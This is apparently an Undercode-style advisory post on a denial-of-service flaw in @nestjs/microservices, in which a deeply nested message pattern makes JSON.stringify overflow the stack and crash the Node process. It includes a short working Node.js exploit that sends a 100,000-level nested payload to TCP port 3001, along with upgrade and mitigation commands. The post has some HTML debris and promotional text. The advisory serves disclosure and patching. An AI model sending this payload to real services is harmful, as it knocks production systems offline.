Listen to this Post
The vulnerability affects @nestjs/microservices.
It impacts TCP and RabbitMQ transports.
A client sends one message.
The message pattern is deeply nested.
The server receives the packet.
It checks if pattern is a string.
If not, it calls JSON.stringify.
JSON.stringify recursively walks objects.
Deep nesting exceeds call stack.
A RangeError is thrown.
The error is Maximum call stack size exceeded.
The exception escapes the async handler.
No rejection handler is attached.
The promise rejection becomes unhandled.
Node.js default –unhandled-rejections=throw.
The process terminates.
One message causes one crash.
The attack is repeatable.
The attacker must reach transport.
TCP port 3001 by default.
TCP transport has no authentication.
RabbitMQ queue or exchange must be reachable.
Other transports are not affected.
They take pattern as string.
They do not serialize client object.
JSON.parse accepts deeper nesting.
JSON.stringify cannot re-serialize it.
Attacker builds nested JSON as text.
Payload parses on arrival.
Then stringify throws during lookup.
Crash occurs before handler runs.
DailyCVE Form:
Platform: npm
Version: <11.2.4, 12.0.0-12.0.1
Vulnerability: Unhandled Rejection DoS
Severity: Not provided
date: Not provided
Prediction: Patch date unknown
What Undercode Say:
Analytics:
-
</dt> <dt>npm ls @nestjs/microservices</dt> <dt>npm view @nestjs/microservices versions</dt> <dt>npm audit</dt> <dt>
-
</dt> <dt>const pattern = isString(packet.pattern)</dt> <dt>? packet.pattern</dt> <dd>JSON.stringify(packet.pattern);
const pattern = '{"nested":'.repeat(DEPTH) + '{}' + '}'.repeat(DEPTH);
Exploit: (Educational Purposes!)
const { connect } = require('node:net');
const DEPTH = 100_000;
const pattern = '{"nested":'.repeat(DEPTH) + '{}' + '}'.repeat(DEPTH);
const payload = <code>{"pattern":${pattern},"data":null,"id":"1"}</code>;
const socket = connect(3001, '127.0.0.1', () => {
socket.write(<code>${Buffer.byteLength(payload)}${payload}</code>);
});
node exploit.js
Protection: from this CVE
npm install @nestjs/[email protected] npm install @nestjs/[email protected]
ServergetPatternAsString handleError
node --unhandled-rejections=warn app.js
Impact:
Denial of service, one message per crash, repeatable. Attacker needs reach transport. TCP no auth default. Only TCP and RabbitMQ affected.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

